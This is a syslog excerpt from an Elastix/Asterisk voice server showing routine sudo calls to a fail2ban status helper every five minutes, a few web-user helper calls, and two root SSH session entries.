Jun 9 12:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 12:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:08:18 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table httpd
Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table asterisk
Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table sshd
Jun 9 13:08:19 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --checkservice --table vsftpd
Jun 9 13:08:20 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --dumpiptables
Jun 9 13:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:20:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 13:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 14:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 15:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:10:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 16:51:21 voicesrv01 sshd[15163]: pam_unix(sshd:session): session closed for user root
Jun 9 16:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 17:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 18:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 19:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:14:09 voicesrv01 sshd[30173]: Accepted password for root from 98.242.248.14 port 52790 ssh2
Jun 9 20:14:09 voicesrv01 sshd[30173]: pam_unix(sshd:session): session opened for user root by (uid=0)
Jun 9 20:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 20:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:30:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:40:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:50:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 21:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:00:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 22:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:15:36 voicesrv01 sudo: asterisk : TTY=unknown ; PWD=/var/www/html ; USER=root ; COMMAND=/usr/sbin/elastix-helper hdmodelreport
Jun 9 23:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 9 23:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 00:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:05:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:15:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:25:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:35:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:45:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 01:55:02 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:05:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:10:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:15:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:20:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:25:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:30:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:35:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:40:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:45:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:50:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 02:55:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
Jun 10 03:00:01 voicesrv01 sudo: root : TTY=unknown ; PWD=/root ; USER=root ; COMMAND=/usr/sbin/elastix-helper fail2ban --getstatus
